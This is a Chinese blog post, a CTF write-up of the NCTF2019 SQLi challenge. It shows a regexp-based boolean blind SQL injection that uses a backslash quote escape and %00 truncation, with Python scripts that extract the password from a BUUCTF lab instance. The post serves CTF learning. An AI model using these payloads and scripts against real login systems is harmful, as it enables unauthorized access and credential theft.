[NCTF2019]SQLi——%00截断的“呼唤”

于 2021-11-01 16:44:31 发布
阅读量781 收藏 1
点赞数 1
分类专栏: CTF sql注入 复现 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/121082082
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 3 订阅
订阅专栏
sql注入
5 篇文章 0 订阅
订阅专栏

前言

本来是想趁这个时间点把逆向的作业做一做的,哪想到我装有工具的虚拟机突然暴毙了。抱着个电脑没什么可以做的,没事闲的又做了道sql的题目,也算是弥补了昨天没做题目的遗憾。

正文

关于%00的截断原理是这样的:

0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。

但是这道题我们不是通过%00后面的内容去绕过文件格式的过滤,我们是要通过%00帮我们把最后的引号给屏蔽掉,这是我们的最终目的。
先来看题。
请添加图片描述
题目的作者让我们去构建一个查询语句使这个语句有一个自己的单独结果。这个先不管他,我们先到hint.txt去看一下提示
在这里插入图片描述
emm,看来这道题过滤了很多东西,看这一大长串我就头疼。过滤了这么多东西,但是他仍旧没有过滤regexp我们仍可以根据正则匹配去进行bool盲注。
但是有一点需要注意的是,他将单引号过滤掉了,这导致我们无法进行username字段的闭合。这里我们用一个反斜杠来转义他本身的sql语句的引号让后面的引号去闭合前面的字段。
就像这样:
在这里插入图片描述
那么接下来就是如何将passwd处的值成为我们的sql语句并使其正常执行。
请考虑如下的payload

||/**/passwd/**/regexp/**/"^a";

如果我们成功匹配了一个字母a的话,上述payload的返回值就是1。这样就通过regexp实现了bool盲注。但是有一个问题,我们如何处理最后多出来的一个单引号?这就要用到我们开篇所说的%00截断了,我们直接将后面的单引号截断,那他就不会影响到我们的发挥了。
我们用burp尝试一下
请添加图片描述
如果我们将上面的a换成y的话,就会出现不一样的回显
请添加图片描述
再次尝试几个字母后我们发现,除了y没有与其有相同回显的字母。由此判断,该回显为正确发包后的回显。这里从burp中的repeater无法直接看出来,事实上如果是y的话,服务端会请求一个welcome页面。
我们这次换一个方式进行观察,因为我们最终是要编写脚本的,所以就用python写一个发送单个包的脚本,来看一下响应。

import requests
from urllib.parse import unquote

def start_ascii():
    result = ""
    url = "http://1b88a5db-2410-4915-8381-b290561f45c6.node4.buuoj.cn:81/index.php"
    for i in range(1,300):
        mid = 32
        while(mid < 128):
            let = result + chr(mid)
            payload = "||/**/passwd/**/regexp/**/\"^y\";" + unquote("%00")
            data = {
                "username": "\\",
                "passwd": payload}
            print(payload)
            res = requests.post(url, data=data)
            print(res.text)
            if "alert" in res.text:
                mid += 1
            else:
                result = result + chr(mid)
                break
        print(result)

if __name__ == "__main__":
    start_ascii()

响应如下图
(其他字母的回显)
请添加图片描述
(y的回显)
请添加图片描述
我们直接根据其中的关键字编写自动化脚本

import requests
from urllib.parse import unquote
import string

def start_ascii():
    result = ""
    strings = string.ascii_lowercase + string.digits + '_'
    url = "http://1b88a5db-2410-4915-8381-b290561f45c6.node4.buuoj.cn:81/index.php"
    for i in range(1,300):

        for m in strings:
            let = result + m
            payload = "||/**/passwd/**/regexp/**/\"^{}\";{}".format(let, unquote('%00'))
            data = {
                "username": "\\",
                "passwd": payload}
            # print(payload)
            res = requests.post(url, data=data)
            if "welcome.php" in res.text:
                result = result + m
                break
            else:
                continue
        print(result)

if __name__ == "__main__":
    start_ascii()

结果如下
请添加图片描述
我们拿到passwd之后直接去登陆界面,就可以进去了。
请添加图片描述

后记

sql新的盲注姿势regexp,另一个等同于注释的方法用来屏蔽最后的引号——%00截断。(%00截断的应用是有特殊条件的:PHP<5.3.29,且GPC关闭)。

入山梵行
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【文件上传】00截断详解
redwand的博客
02-03 2万+
00截断是操作系统层的漏洞,由于操作系统是C语言或汇编语言编写的,这两种语言在定义字符串时,都是以\0(即0x00)作为字符串的结尾。操作系统在识别字符串时,当读取到\0字符时,就认为读取到了一个字符串的结束符号。因此,我们可以通过修改数据包,插入\0字符的方式,达到字符串截断的目的。00截断通常用来绕过web软waf的白名单限制
白名单绕过(%00截断)全网都不会详细讲解的截断原理
m0_58351659的博客
04-01 8514
白名单绕过(%00截断
00截断原理
weixin_45522644的博客
07-17 4046
0x00截断原理: 0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。这个可以用在对文件类型名的绕过上。 但要注意是文件的16进制内容里的00,而不是文件名中的00 !!!就是说系统是按16进制读取文件(或者说二进制), 遇到ascii码为零的位置就停止,而这个ascii码为零的位置在16进制中是00,用0x开头表示16进制,也就是所说的0x00截断。 %00是被服务器解码为0x00发挥了截断作用。
sql注入的总结
weixin_44232687的博客
11-26 659
sql注入的原理 它是发生在应用程序与数据层的安全漏洞,用自己的话说,就是在输入的字符串中注入sql指令,因为程序设计不当,忽略了对字符的检查,这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 可能带来的危害: 重要资料信息的泄露; 数据库服务器被攻击,系统管理员账户被篡改 获取系统较高的权限后,在网页中加入恶意的连接。 经由上传php简单的指令至对方之主机内,PHP之强大系统命令,可以让黑客进行全面控制系统(例如:php一句话木马)。 企业网站主
00截断上传绕过_关于上传中的00截断分析
weixin_39922929的博客
12-20 615
关于上传中00截断的细节,很多朋友在渗透中都会发现一些这样的有趣现象,这个站点使用00截断上传的方法上传成功了,而换一个站点又失败了,这是什么原因呢?你看了这篇文章就会明白。00截断原理0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。00截断的限制条件1PHP<5.3.29,且GPC关闭00截断的利用方法上传文...
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
2024NCTF部分题目资源包
02-06
比赛已经结束,请最终排名前26且符合条件者(目前是2023级就读)的选手将【详细】wp于24小时内(即2/5 21:00)发送至root@nu1l.com 一血题目奖励我们会发放至注册邮箱Nu1L Team组织的官方纳新赛事,旨在选拔优秀...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
RSA加密软件 (VC++,MFC程序实现)
05-27
RSA加密程序实现VC++ ,MFC 可以产生任意位数的大数素,可以作为毕业论文哈。也是学习RSA加密的好例子,可以学到很多的加密函数和加密算法,很多算法是很经典的 ,比如欧拉定理,费马定理,还有中国剩余定理等.........
论文研究 - 健康志愿者皮肤修复的美速疗法配方的临床评估
06-01
我们的主要目标是评估在皮内显微注射NCTF135HA:registered:后面部,颈部和领口皮肤质量的改善情况。 该混合物由FILORGA Laboratories制造,包含非交联的透明质酸,维生素,抗氧化剂,矿物质盐和酶。 观察到鱼尾纹...
南京邮电大学第十一届网络攻防大赛开源题目.zip
10-23
开源题目.zip文件很可能是本次大赛提供的挑战题目集合,其中包含了一个名为"NCTF2022-main"的子文件。这个压缩包很可能是为了参赛者准备的,让他们在解压后可以接触到具体的赛题,进行实战演练。 网络安全攻防大赛...
TigerLake UP3 UP4 PDG
05-15
NCTF焊球是指对系统功能非必需但有助于检测和诊断的焊球。这部分指导了如何定义焊盘、实施连续性/电阻测试阈值,以及Tiger Lake UP3和UP4平台的PCB布线指导。 3.0 一般设计考量 这部分涵盖了高速输入/输出(HSIOs)...
BUUCTF:[NCTF2019]SQLi --sql正则注入 ---- regexp注入 --- sql 闭合的新的骚操作 --PHP版本的%00截断
Zero_Adam的博客
03-15 964
目录:一、自己做,二、学到的:三、学习WP:1.盲注, 这个讲正则注入原理比较细致,有mysql的本地实验 这个有一道例题 一、自己做, fuzzing了,但是没有思路, 给我这么一句话:try to make the sqlquery have its own results. 后来发现没用, 二、学到的: mysql正则注入 regex 一个新的sql闭合方式,妈呀,骚的很,至少对于我这个菜鸡才说是开了眼界了,,,牛你牛后面看看 sql注入时,当注释符和单引号都被过滤了的时候,我们不能够闭合语句了,
WEB漏洞 关于%00的传参空格漏洞
u013702409的专栏
12-15 720
在代码中过滤空格 过滤方式:pathfile = pathfile.replace("\0","");
HTML URL 编码
asli33的专栏
09-01 9515
参考网址:http://www.w3schools.com/cn/tags/ref_urlencode.asp URL编码(URL encoding)的作用是将字符转化为可在因特网上安全传输的格式。 URL——统一资源定位符 Web浏览器通过URL从Web服务器
关于 url 终止符 %00 的问题
java-北京-菜鸟
01-06 2900
问题: 前台传入struts2 的参数总是报格式不正确, 通过 console.log 发现参数后面多了一个 %00, 查了很久才知道这是 url 的终止符. 我的这个 url 是通过另一个 url 拼接过来的 例如: url1 = test.do?name=tom&amp;age=12; 然后我用 location.href 获取 url1 , 通过 split 获取其中的 name ...
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值